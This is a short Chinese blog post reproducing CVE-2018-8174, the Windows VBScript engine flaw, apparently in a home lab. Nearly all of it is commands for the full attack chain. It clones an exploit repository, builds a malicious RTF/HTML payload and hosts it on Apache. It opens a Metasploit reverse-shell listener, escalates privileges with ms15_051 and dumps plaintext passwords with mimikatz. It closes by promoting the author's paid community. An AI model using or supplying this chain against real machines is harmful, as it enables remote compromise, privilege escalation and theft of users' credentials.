CVE-2018-8174 漏洞复现

0x00. 序言

  漏洞描述CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的32位 IE浏览器及使用了IE内核的应用程序。

0x01. 操作演示

1. 下载EXP到kali ,生成木马文件,启动msf监听

1
2
3
4
5
git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git
cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.1.111/exploit.html -o exploit.rtf -i 192.168.1.111 -p 4444
cp exploit.html /var/www/html/
service apache2 start
1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 192.168.1.111
set lport 4444
run

2. 靶机访问 http://192.168.1.111/exploit.html

3. 先将 shell 转换为 meterpreter ,再利用ms15_051提权

1
2
3
4
sessions -u 2
use windows/local/ms15_051_client_copy_image
set session 3
run

4. 利用mimikatz 盗取明文密码

1
2
3
load mimikatz
msv
kerberos

0x02. 结语

  欢迎大家加入我的知识星球,我会不定期的发布渗透相关教程和学习上的经验、踩过的坑!

文章目录
  1. 1. 0x00. 序言
    1. 1.0.1.   漏洞描述CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的32位 IE浏览器及使用了IE内核的应用程序。
  • 2. 0x01. 操作演示
    1. 2.0.1. 1. 下载EXP到kali ,生成木马文件,启动msf监听
    2. 2.0.2. 2. 靶机访问 http://192.168.1.111/exploit.html
    3. 2.0.3. 3. 先将 shell 转换为 meterpreter ,再利用ms15_051提权
    4. 2.0.4. 4. 利用mimikatz 盗取明文密码
  • 3. 0x02. 结语
    1. 3.1.   欢迎大家加入我的知识星球,我会不定期的发布渗透相关教程和学习上的经验、踩过的坑!
  • |